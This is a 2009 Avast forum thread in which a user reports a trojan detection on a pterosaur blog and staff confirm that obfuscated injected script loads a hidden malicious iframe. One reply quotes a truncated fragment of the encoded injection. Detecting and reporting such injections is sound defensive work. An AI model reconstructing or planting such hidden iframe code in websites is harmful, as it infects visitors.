« previous next »
Pages: [1]   Go Down

Author Topic: Should I report an IFrame-EC to anyone?  (Read 4435 times)

0 Members and 1 Guest are viewing this topic.

cromag

  • Guest
Should I report an IFrame-EC to anyone?
« on: May 13, 2009, 10:51:44 AM »
I was surfing the net tonight in search of info on Paleontolgy -- specifically, pterosaurs -- and Avast alerted to an IFrame-EC trojan in a legitimate site:

Code: [Select]
5/13/2009 4:23:22 AM SYSTEM 284 Sign of "HTML:IFrame-EC [Trj]" has been found in "http://XXX.networlddirectory.com/blogs/permalinks/1-2009/watch-out-some-pterosaurs-take-off.html" file. 

I replaced the "w"s with "X"s to be safe.  If that's not good enough let me know (or an Admin can delete).


Anyway, the site has never given me a problem before -- should this be reported anywhere?

Thanks.
Logged

Offline jsejtko

  • Avast team
  • Full Member
  • *
  • Posts: 171
    • ALWIL Software
Re: Should I report an IFrame-EC to anyone?
« Reply #1 on: May 13, 2009, 01:21:15 PM »
Welcome cromag,

the website contains obfuscated script at the end of the code - it contains iframe that points into malicious server. Please try to contact webmaster/owner and tell him about this problem - it need fix from someone who have got access to the server.

Best regards

PS: Attached image shows the infection - using red arrows.
Logged

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Should I report an IFrame-EC to anyone?
« Reply #2 on: May 13, 2009, 04:15:13 PM »
Hi cromag,

This detection is also found by unmaskparasites:
Code: [Select]
var k1='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4^#wrs=#4%A?liudph#vuf@%kwws=22',...

So the detection is a valid one, and you should contact the site admin or webmaster for that reason,

polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

cromag

  • Guest
Re: Should I report an IFrame-EC to anyone?
« Reply #3 on: May 13, 2009, 07:19:20 PM »
Thank you, I have sent an email to the webmaster.  Now I just hope it gets read.

If I encounter additional things like this (or, more likely "when ..." in today's world) should I touch base with the forum here to get the malware verified?


Thanks again.
Logged

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
Re: Should I report an IFrame-EC to anyone?
« Reply #4 on: May 13, 2009, 09:25:47 PM »
Hi cromag,

Well this clearly is our duty and our responsibilty towards the users of the Internet. It is very important to report these things here if it is only that other users are aware of these things going on on to-day's Internet and more importantly what they can do to detect and protect themselves against these online infecting sites.
The user of the browser is protected through the avast shield protection, can enhance prevention by pre-scanning with real time site scanning like finjan, use scandoo.com as a searchengine or prevent malicious script from running inside the browser by installing NoScript in browsers like Firefox or flock, and block request from third party redirects through an extension like RequestPolicy. As the problem of malicious code injection to trusted vulnerable sites is expanding rapidly appropriate prevention and protection has an important priority, and as one of the few av solution that take this ongoing threat seriously avast is doing a hell of a job and saved many users when visiting these suspicious or malware ridden websites,

polonus
Logged
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
Pages: [1]   Go Up
« previous next »